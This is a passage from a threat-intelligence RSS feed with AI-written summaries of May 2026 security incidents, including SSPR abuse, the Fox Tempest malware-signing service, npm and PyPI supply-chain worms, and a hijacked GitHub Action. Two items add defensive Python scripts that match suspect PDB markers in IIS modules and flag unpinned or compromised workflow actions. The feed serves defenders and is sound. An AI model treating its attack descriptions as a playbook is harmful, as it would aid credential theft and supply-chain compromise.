      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;A threat actor tracked as STORM-1811 is actively targeting Microsoft 365 and Azure production environments by abusing legitimate applications such as Self-Service Password Reset (SSPR) and Azure AD administrative features. The attackers gain initial access through brute force, password spray, and phishing campaigns. Once inside, they exploit SSPR to persist and escalate privileges, enabling data theft. The campaign highlights the risk of abused native cloud features, which can evade traditional defenses. Organizations relying on Microsoft 365 and Azure should monitor for unusual SSPR activity, enforce multifactor authentication, and review privileged role assignments to mitigate this threat.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This attack abuses trusted admin features like SSPR, allowing threat actors to blend in with normal activities and steal sensitive data from production environments.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Audit SSPR usage logs for unauthorized password resets, enforce strong MFA policies, and monitor for anomalous Azure AD administrative role assignments.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Account Takeover, Data Theft&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/microsoft-self-service-password-reset-abused-in-azure-data-theft-attacks/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 19 May 2026 19:35:32 GMT</pubDate>
      <dc:creator>Bill Toulas</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/microsoft-self-service-password-reset-abused-in-azure-data-theft-attacks/">Bleeping Computer</source>
      <category>Adversary</category>
      <category>Account Takeover</category>
      <category>Data Theft</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>durabletask: TeamPCP&#x27;s Latest PyPi Compromise</title>
      <link>https://brewedintel.io/articles/c00a27df-89d6-4761-a75d-7aa55e08e006</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/c00a27df-89d6-4761-a75d-7aa55e08e006</guid>
      <description>This article reports that malicious versions of the PyPi package durabletask have been discovered, attributed to the threat actor TeamPCP. The compromised package likely contains trojanized code that can lead to supply chain attacks. Organizations using this package should audit their dependencies. The impact could include unauthorized access and execution of malicious code. Mitigation involves verifying package integrity, updating to safe versions, and monitoring for suspicious behavior.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;This article reports that malicious versions of the PyPi package durabletask have been discovered, attributed to the threat actor TeamPCP. The compromised package likely contains trojanized code that can lead to supply chain attacks. Organizations using this package should audit their dependencies. The impact could include unauthorized access and execution of malicious code. Mitigation involves verifying package integrity, updating to safe versions, and monitoring for suspicious behavior.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Supply chain attacks through compromised PyPi packages can affect numerous downstream users, potentially leading to widespread breaches.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Audit your projects for use of the durabletask package, verify its integrity against known hashes, and consider using package scanning tools to detect malicious components.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Other, High Severity, Supply Chain Compromise&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Wiz Security Research | &lt;a href=&quot;https://www.wiz.io/blog/durabletask-teampcp-supply-chain-attack&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 19 May 2026 17:30:20 GMT</pubDate>
      <dc:creator>Rami McCarthy</dc:creator>
      <source url="https://www.wiz.io/blog/durabletask-teampcp-supply-chain-attack">Wiz Security Research</source>
      <category>Other</category>
      <category>Supply Chain Compromise</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Microsoft Disrupts Malware-Signing Service Run by ‘Fox Tempest’</title>
      <link>https://brewedintel.io/articles/d558f31e-0c27-470b-b9d2-64f19e1f5f3d</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/d558f31e-0c27-470b-b9d2-64f19e1f5f3d</guid>
      <description>Microsoft disrupted a malware-signing service operated by the threat actor Fox Tempest. This service was used by cybercriminals to sign ransomware and other malware with valid code signing certificates, allowing the malicious software to appear legitimate and evade security defenses. The disruption removes a key enabler for ransomware operations, reducing the ability of adversaries to distribute signed malware. Organizations are advised to remain vigilant and enforce strict code signing verification, as the service&#x27;s takedown may temporarily reduce but not eliminate the threat from signed malware.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Microsoft disrupted a malware-signing service operated by the threat actor Fox Tempest. This service was used by cybercriminals to sign ransomware and other malware with valid code signing certificates, allowing the malicious software to appear legitimate and evade security defenses. The disruption removes a key enabler for ransomware operations, reducing the ability of adversaries to distribute signed malware. Organizations are advised to remain vigilant and enforce strict code signing verification, as the service&amp;#x27;s takedown may temporarily reduce but not eliminate the threat from signed malware.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Fox Tempest&amp;#x27;s signing service enabled ransomware operators to bypass security defenses by masquerading malicious executables as legitimate software, increasing the risk of successful compromise.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Enforce strict code signing policies, inspect all signed binaries for validity, and deploy endpoint detection solutions capable of identifying anomalous signing behavior and signed malware.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/microsoft-disrupts-malware-signing-service-run-by-fox-tempest/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 19 May 2026 16:06:22 GMT</pubDate>
      <dc:creator>Eduard Kovacs</dc:creator>
      <source url="https://www.securityweek.com/microsoft-disrupts-malware-signing-service-run-by-fox-tempest/">SecurityWeek</source>
      <category>Malware</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Exposing Fox Tempest: A malware-signing service operation</title>
      <link>https://brewedintel.io/articles/b6d58f36-8ee0-4615-bfcb-425e7b8c894e</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/b6d58f36-8ee0-4615-bfcb-425e7b8c894e</guid>
      <description>Fox Tempest is a financially motivated threat actor operating a malware-signing-as-a-service (MSaaS) that abuses Microsoft Artifact Signing to provide short-lived, fraudulently signed certificates to other cybercriminals, including Vanilla Tempest and Storm groups. This service enables trusted delivery of malware such as Rhysida ransomware, Oyster, Lumma Stealer, and Vidar, allowing them to bypass security controls and successfully execute on victim systems. Over a thousand certificates and hundreds of Azure subscriptions were established, impacting sectors like healthcare, education, government, and finance globally. In May 2026, Microsoft&#x27;s Digital Crimes Unit disrupted the service, revoking certificates and taking down infrastructure. Organizations are urged to use advanced detection and endpoint security solutions to mitigate signed malware threats.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Fox Tempest is a financially motivated threat actor operating a malware-signing-as-a-service (MSaaS) that abuses Microsoft Artifact Signing to provide short-lived, fraudulently signed certificates to other cybercriminals, including Vanilla Tempest and Storm groups. This service enables trusted delivery of malware such as Rhysida ransomware, Oyster, Lumma Stealer, and Vidar, allowing them to bypass security controls and successfully execute on victim systems. Over a thousand certificates and hundreds of Azure subscriptions were established, impacting sectors like healthcare, education, government, and finance globally. In May 2026, Microsoft&amp;#x27;s Digital Crimes Unit disrupted the service, revoking certificates and taking down infrastructure. Organizations are urged to use advanced detection and endpoint security solutions to mitigate signed malware threats.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Fox Tempest provides signed malware to ransomware operators, bypassing traditional security controls and increasing the risk of successful compromise and extortion across a wide range of industries.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement endpoint detection and response (EDR) with behavioral analytics, enforce application control policies, and regularly review and revoke suspicious signing certificates using Microsoft Defender&amp;#x27;s indicators of compromise.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Malware Distribution, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Microsoft Security Blog | &lt;a href=&quot;https://www.microsoft.com/en-us/security/blog/2026/05/19/exposing-fox-tempest-a-malware-signing-service-operation/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 19 May 2026 15:07:01 GMT</pubDate>
      <dc:creator>Microsoft Threat Intelligence</dc:creator>
      <source url="https://www.microsoft.com/en-us/security/blog/2026/05/19/exposing-fox-tempest-a-malware-signing-service-operation/">Microsoft Security Blog</source>
      <category>Malware</category>
      <category>Malware Distribution</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>7-Eleven confirms data breach claimed by the ShinyHunters gang</title>
      <link>https://brewedintel.io/articles/a62e6b74-e7ee-4689-b4ee-163132754752</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/a62e6b74-e7ee-4689-b4ee-163132754752</guid>
      <description>7-Eleven confirmed a data breach claimed by the ShinyHunters extortion group. The incident exposed customer data, and the group is likely to demand a ransom. The breach underscores the persistent threat from cybercriminal groups targeting large retailers. Mitigation includes enhancing network segmentation, enforcing multi-factor authentication, and conducting regular security audits.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;7-Eleven confirmed a data breach claimed by the ShinyHunters extortion group. The incident exposed customer data, and the group is likely to demand a ransom. The breach underscores the persistent threat from cybercriminal groups targeting large retailers. Mitigation includes enhancing network segmentation, enforcing multi-factor authentication, and conducting regular security audits.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;A confirmed breach at a major retailer like 7-Eleven indicates that attackers can compromise sensitive customer data, leading to financial and reputational damage.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement robust access controls, enable logging and monitoring for unusual data exfiltration, and ensure incident response plans are up to date to quickly contain such breaches.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Data Breach, Extortion&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/7-eleven-confirms-data-breach-claimed-by-the-shinyhunters-gang/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 19 May 2026 14:16:41 GMT</pubDate>
      <dc:creator>Sergiu Gatlan</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/7-eleven-confirms-data-breach-claimed-by-the-shinyhunters-gang/">Bleeping Computer</source>
      <category>Malware</category>
      <category>Data Breach</category>
      <category>Extortion</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>B1ack’s Stash Marketplace Gives Away 4.6 Million Stolen Credit Cards</title>
      <link>https://brewedintel.io/articles/f608cdbb-8ffa-4fb7-bddd-9894b1c15ce3</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/f608cdbb-8ffa-4fb7-bddd-9894b1c15ce3</guid>
      <description>A marketplace known as B1ack&#x27;s Stash has released 4.6 million stolen credit card numbers for free download, reportedly due to seller misconduct. This massive disclosure poses a significant risk of financial fraud and identity theft for affected individuals. The data can be used for unauthorized purchases, account takeovers, and other criminal activities. Organizations should take immediate steps to protect their customers and systems, including enhancing fraud detection and alerting cardholders. The incident highlights the ongoing threat of stolen financial data being traded on underground markets.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;A marketplace known as B1ack&amp;#x27;s Stash has released 4.6 million stolen credit card numbers for free download, reportedly due to seller misconduct. This massive disclosure poses a significant risk of financial fraud and identity theft for affected individuals. The data can be used for unauthorized purchases, account takeovers, and other criminal activities. Organizations should take immediate steps to protect their customers and systems, including enhancing fraud detection and alerting cardholders. The incident highlights the ongoing threat of stolen financial data being traded on underground markets.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;The free distribution of millions of stolen credit cards increases the attack surface for financial fraud, putting both consumers and financial institutions at risk.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Deploy robust fraud detection systems, encourage reissuance of affected cards, and educate customers on monitoring transactions.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Other, High Severity, Data Theft, Financial Fraud&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/b1acks-stash-marketplace-gives-away-4-6-million-stolen-credit-cards/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 19 May 2026 11:59:13 GMT</pubDate>
      <dc:creator>Ionut Arghire</dc:creator>
      <source url="https://www.securityweek.com/b1acks-stash-marketplace-gives-away-4-6-million-stolen-credit-cards/">SecurityWeek</source>
      <category>Other</category>
      <category>Data Theft</category>
      <category>Financial Fraud</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>From PDB strings to MaaS: Tracking a commodity BadIIS ecosystem used by Chinese-speaking threat</title>
      <link>https://brewedintel.io/articles/39f1cea5-2a23-4301-880d-695ae40a4e77</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/39f1cea5-2a23-4301-880d-695ae40a4e77</guid>
      <description>Cisco Talos has identified a commercially distributed BadIIS variant operated under a malware-as-a-service model and used by Chinese-speaking cybercriminals. Tracked since 2021 and actively maintained through early 2026, this commodity malware automates web server compromise on Microsoft IIS infrastructure. Primary objectives include SEO fraud, content hijacking, and traffic redirection for search engine manipulation. The toolset features robust persistence mechanisms, automated deployment, and obfuscation techniques that evade antivirus detection and survive server restarts. Impact spans global IIS deployments, enabling attackers to monetize traffic and manipulate search engine rankings. Defense strategies should prioritize monitoring IIS service anomalies, auditing the PDB paths embedded in IIS module binaries and any custom native modules, and enforcing strict application allowlisting. Continuous log analysis and proactive threat hunting for known MaaS distribution patterns are recommended.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Cisco Talos has identified a commercially distributed BadIIS variant operated under a malware-as-a-service model and used by Chinese-speaking cybercriminals. Tracked since 2021 and actively maintained through early 2026, this commodity malware automates web server compromise on Microsoft IIS infrastructure. Primary objectives include SEO fraud, content hijacking, and traffic redirection for search engine manipulation. The toolset features robust persistence mechanisms, automated deployment, and obfuscation techniques that evade antivirus detection and survive server restarts. Impact spans global IIS deployments, enabling attackers to monetize traffic and manipulate search engine rankings. Defense strategies should prioritize monitoring IIS service anomalies, auditing the PDB paths embedded in IIS module binaries and any custom native modules, and enforcing strict application allowlisting. Continuous log analysis and proactive threat hunting for known MaaS distribution patterns are recommended.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This actively maintained, commercially distributed BadIIS variant poses a significant risk to organizational IIS deployments by enabling persistent server compromise, traffic hijacking, and lucrative SEO fraud campaigns. Its MaaS distribution model increases the likelihood of targeted, automated attacks across your infrastructure.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Audit IIS installations for unauthorized native modules and binaries, compare the PDB paths embedded in module DLLs against the strings Talos associates with this ecosystem, and enforce application control policies to block unsigned or anomalous web server components. Monitor for unexpected outbound traffic redirection and for responses that differ when the client identifies itself as a search engine crawler.&lt;/p&gt;
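&lt;p&gt;Added example (not Talos tooling): an audit over an inventory of IIS native modules that flags any module loading from outside the inetsrv directory and pulls the PDB path out of each DLL by scanning for its CodeView RSDS record, matching it against suspect markers. The module list, the file contents and the marker strings are constructed placeholders; in practice the inventory comes from the globalModules section of applicationHost.config and the markers from the Talos report.&lt;/p&gt;

```python
# Audit IIS native modules: where each DLL loads from, and what PDB path its
# CodeView debug record carries. Added example, not Talos code. The module
# inventory is passed in as a list and file contents come from a reader
# callable so the constructed sample below runs offline.

INETSRV_DIR = r"c:\windows\system32\inetsrv"

# Hypothetical markers; substitute the PDB strings from the Talos report.
SUSPECT_PDB_MARKERS = ["iisseo", "badiis"]


def extract_pdb_paths(data):
    """Return PDB paths found in RSDS (CodeView) records inside PE bytes.

    An RSDS record is the 4-byte signature, a 16-byte GUID, a 4-byte age and
    a NUL-terminated path. Scanning for the signature is a triage heuristic;
    a full PE parser would walk the debug directory instead.
    """
    paths = []
    pos = 0
    while True:
        start = data.find(b"RSDS", pos)
        if start == -1:
            break
        path_start = start + 24
        end = data.find(b"\x00", path_start)
        if end == -1:
            break
        raw = data[path_start:end]
        if raw.lower().endswith(b".pdb"):
            try:
                paths.append(raw.decode("ascii"))
            except UnicodeDecodeError:
                pass
        pos = start + 4
    return paths


def audit_modules(modules, read_bytes):
    """Return (module name, reasons) for every module that looks suspicious."""
    findings = []
    for module in modules:
        reasons = []
        image = module["image"].lower()
        if not image.startswith(INETSRV_DIR):
            reasons.append("native module loaded from outside inetsrv: " + module["image"])
        for pdb in extract_pdb_paths(read_bytes(module["image"])):
            lowered = pdb.lower()
            if any(marker in lowered for marker in SUSPECT_PDB_MARKERS):
                reasons.append("PDB path matches a suspect marker: " + pdb)
        if reasons:
            findings.append((module["name"], reasons))
    return findings


def fake_dll(pdb_path):
    """Build a stand-in DLL image carrying one RSDS record (constructed data)."""
    rsds = b"RSDS" + bytes(range(16)) + b"\x01\x00\x00\x00" + pdb_path.encode("ascii") + b"\x00"
    return b"MZ" + b"\x00" * 60 + rsds + b"\x00" * 16


# Constructed inventory and file contents; the PDB paths are placeholders.
SAMPLE_MODULES = [
    {"name": "UriCacheModule", "image": r"C:\Windows\System32\inetsrv\cachuri.dll"},
    {"name": "FastSeoModule", "image": r"C:\Windows\Temp\seo.dll"},
]
SAMPLE_FILES = {
    r"C:\Windows\System32\inetsrv\cachuri.dll": fake_dll(r"d:\build\inetsrv\cachuri.pdb"),
    r"C:\Windows\Temp\seo.dll": fake_dll(r"C:\work\iisseo\Release\seo.pdb"),
}


def audit_sample_modules():
    return audit_modules(SAMPLE_MODULES, lambda path: SAMPLE_FILES[path])


if __name__ == "__main__":
    for name, reasons in audit_sample_modules():
        print(name, reasons)
```

&lt;p&gt;On a real server replace the reader with a function that opens the path from the inventory, and treat a module outside inetsrv as a finding even when its PDB path matches nothing: the load location is the signal that survives a rebuilt binary.&lt;/p&gt;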
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Malware-as-a-Service (MaaS), SEO Fraud, Traffic Manipulation&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Cisco Talos Intelligence Group | &lt;a href=&quot;https://blog.talosintelligence.com/from-pdb-strings-to-maas-tracking-a-commodity-badiis-ecosystem/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 19 May 2026 10:00:20 GMT</pubDate>
      <dc:creator>Joey Chen</dc:creator>
      <source url="https://blog.talosintelligence.com/from-pdb-strings-to-maas-tracking-a-commodity-badiis-ecosystem/">Cisco Talos Intelligence Group</source>
      <category>Malware</category>
      <category>Malware-as-a-Service (MaaS)</category>
      <category>SEO Fraud</category>
      <category>Traffic Manipulation</category>
      <category>Web Server Compromise</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>The Worm That Keeps on Digging: TeamPCP Hits @antv in Latest Wave</title>
      <link>https://brewedintel.io/articles/66d044ad-7c3e-4934-80b3-99c6be4513d3</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/66d044ad-7c3e-4934-80b3-99c6be4513d3</guid>
      <description>TeamPCP is conducting a multi-ecosystem supply chain compromise spanning GitHub, npm, and VS Code extensions. The attack aims to steal developer credentials and establish persistence within developer environments. By abusing the trust placed in these platforms, the campaign reaches a wide audience and poses significant risk to organizations that rely on open-source components. The impact includes credential theft, loss of code integrity, and downstream compromise of software supply chains. Urgent action is needed to strengthen supply chain security, monitor for malicious extensions, and enforce strict access controls.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;TeamPCP is conducting a multi-ecosystem supply chain compromise spanning GitHub, npm, and VS Code extensions. The attack aims to steal developer credentials and establish persistence within developer environments. By abusing the trust placed in these platforms, the campaign reaches a wide audience and poses significant risk to organizations that rely on open-source components. The impact includes credential theft, loss of code integrity, and downstream compromise of software supply chains. Urgent action is needed to strengthen supply chain security, monitor for malicious extensions, and enforce strict access controls.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This attack targets developer ecosystems, compromising credentials and code integrity, which can lead to widespread supply chain breaches.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement rigorous supply chain security, vet third-party extensions, and enforce least privilege for developer accounts.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Credential Theft, Supply Chain Compromise&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Wiz Security Research | &lt;a href=&quot;https://www.wiz.io/blog/mini-shai-hulud-teampcp-hits-antv-supply-chain&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 19 May 2026 08:29:30 GMT</pubDate>
      <dc:creator>Merav Bar</dc:creator>
      <source url="https://www.wiz.io/blog/mini-shai-hulud-teampcp-hits-antv-supply-chain">Wiz Security Research</source>
      <category>Malware</category>
      <category>Credential Theft</category>
      <category>Supply Chain Compromise</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>GitHub Actions Supply Chain Attack Redirects Tags to Steal CI/CD Credentials</title>
      <link>https://brewedintel.io/articles/97e36c95-6d67-4b11-bd05-87bf6ba1ae1b</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/97e36c95-6d67-4b11-bd05-87bf6ba1ae1b</guid>
      <description>Threat actors compromised the popular GitHub Action &#x27;actions-cool/issues-helper&#x27; in a supply chain attack. By redirecting all existing tags to an imposter commit, they injected malicious code that harvests CI/CD credentials from the runner and exfiltrates them to an attacker-controlled server. This attack highlights the risk of trusting third-party actions in development pipelines, since a compromised action runs with whatever secrets and token permissions the calling workflow grants it. Organizations using this action should immediately audit their usage, rotate any exposed secrets, and pin actions to full commit SHAs rather than tags, because a tag is a mutable pointer that anyone with push access to the action repository can move.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Threat actors compromised the popular GitHub Action &amp;#x27;actions-cool/issues-helper&amp;#x27; in a supply chain attack. By redirecting all existing tags to an imposter commit, they injected malicious code that harvests CI/CD credentials from the runner and exfiltrates them to an attacker-controlled server. This attack highlights the risk of trusting third-party actions in development pipelines, since a compromised action runs with whatever secrets and token permissions the calling workflow grants it. Organizations using this action should immediately audit their usage, rotate any exposed secrets, and pin actions to full commit SHAs rather than tags, because a tag is a mutable pointer that anyone with push access to the action repository can move.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This supply chain attack turns a trusted third-party GitHub Action into a credential harvester, and the secrets it steals can be used to compromise your software development pipeline and the infrastructure it deploys to.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Immediately audit and rotate any credentials the action could have read, and pin actions to full commit SHAs instead of tags so that a moved tag cannot change what runs. Pinning is only as good as the commit you pin: review the pinned commit, and limit what a compromised action can reach by scoping the GITHUB_TOKEN permissions and the secrets each job receives.&lt;/p&gt;
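&lt;p&gt;Added example (not from the report): a line-oriented scan of a workflow file that reports every uses: reference not pinned to a full 40-hex commit SHA and every use of the compromised action. It deliberately avoids a YAML parser so it runs with the standard library only; the workflow below and its 40-hex value are constructed, not a real commit.&lt;/p&gt;

```python
import re

# Added example, not from the report. Scans workflow YAML line by line for
# "uses:" references, so it needs no YAML parser; it flags references that are
# not pinned to a full 40-hex commit SHA and any use of the action named in
# the report.
SHA_RE = re.compile(r"^[0-9a-f]{40}$")
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)")
COMPROMISED_ACTIONS = {"actions-cool/issues-helper"}


def audit_workflow(text):
    """Return (line number, reference, problem) tuples for a workflow file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        match = USES_RE.match(line)
        if not match:
            continue
        ref = match.group(1)
        if ref.startswith("./") or ref.startswith("docker://"):
            continue  # local action or container image: not a tag-redirect target
        repo, _, version = ref.partition("@")
        owner_repo = "/".join(repo.split("/")[:2])  # also covers owner/repo/subdir
        if owner_repo in COMPROMISED_ACTIONS:
            findings.append((lineno, ref, "known-compromised action: rotate every secret this job could read"))
        if not SHA_RE.match(version):
            findings.append((lineno, ref, "not pinned to a commit SHA"))
    return findings


# Constructed workflow; the 40-hex value is a placeholder, not a real commit.
SAMPLE_WORKFLOW = """name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567 # v4
      - uses: actions-cool/issues-helper@v3
      - uses: ./.github/actions/local-step
      - run: npm ci
"""

if __name__ == "__main__":
    for lineno, ref, problem in audit_workflow(SAMPLE_WORKFLOW):
        print("line %d: %s: %s" % (lineno, ref, problem))
```

&lt;p&gt;Run it over every file under .github/workflows. A reference with no @ version at all is reported as unpinned, which is the right outcome: it resolves to the default branch and can change under you just as a tag can.&lt;/p&gt;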
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Credential Theft, Supply Chain Attack&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/github-actions-supply-chain-attack.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 19 May 2026 05:28:06 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/github-actions-supply-chain-attack.html">The Hacker News</source>
      <category>Adversary</category>
      <category>Credential Theft</category>
      <category>Supply Chain Attack</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Mini Shai-Hulud Pushes Malicious AntV npm Packages via Compromised Maintainer Account</title>
      <link>https://brewedintel.io/articles/c894932f-0b9d-4012-95a7-325b1a17ff3f</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/c894932f-0b9d-4012-95a7-325b1a17ff3f</guid>
      <description>The Mini Shai-Hulud supply chain attack campaign has compromised multiple npm packages in the @antv ecosystem by hijacking the maintainer account &#x27;atool&#x27;. The widely used package &#x27;echarts-for-react&#x27; (over 1.1 million weekly downloads) was trojanized, posing a significant risk to downstream consumers. Organizations should immediately audit their use of affected packages, verify integrity, and monitor for suspicious updates to prevent code execution and data theft.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The Mini Shai-Hulud supply chain attack campaign has compromised multiple npm packages in the @antv ecosystem by hijacking the maintainer account &amp;#x27;atool&amp;#x27;. The widely used package &amp;#x27;echarts-for-react&amp;#x27; (over 1.1 million weekly downloads) was trojanized, posing a significant risk to downstream consumers. Organizations should immediately audit their use of affected packages, verify integrity, and monitor for suspicious updates to prevent code execution and data theft.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;A compromised maintainer account led to malicious updates in a popular package with over a million weekly downloads, directly exposing developers and users to supply chain risks.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Pin package versions, review code changes before updating, and verify package provenance (for example SLSA build provenance or npm&amp;#x27;s Sigstore-based provenance attestations) so that a package not built from the expected source repository is caught before it is installed.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Malicious Package, Software Supply Chain Attack&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/mini-shai-hulud-pushes-malicious-antv.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 19 May 2026 04:54:17 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/mini-shai-hulud-pushes-malicious-antv.html">The Hacker News</source>
      <category>Adversary</category>
      <category>Malicious Package</category>
      <category>Software Supply Chain Attack</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Mini Shai-Hulud Hits AntV: 300+ Malicious npm Packages Published via Compromised Maintainer Account</title>
      <link>https://brewedintel.io/articles/ec6491fa-c161-4858-a03f-06533c56f5c8</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/ec6491fa-c161-4858-a03f-06533c56f5c8</guid>
      <description>A supply chain attack via the npm ecosystem targeted the AntV data visualization library. Over 300 malicious package versions were published across 323 packages after a maintainer account was compromised. This is part of the ongoing Mini Shai-Hulud worm campaign, which aims to distribute malware via trusted packages. The attack highlights the risk of compromised credentials in open-source ecosystems. Immediate actions include auditing npm dependencies for affected packages, rotating credentials, and implementing multi-factor authentication. The impact is widespread, potentially affecting any project using the compromised packages. Organizations should review their software supply chain and monitor for unusual activity.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
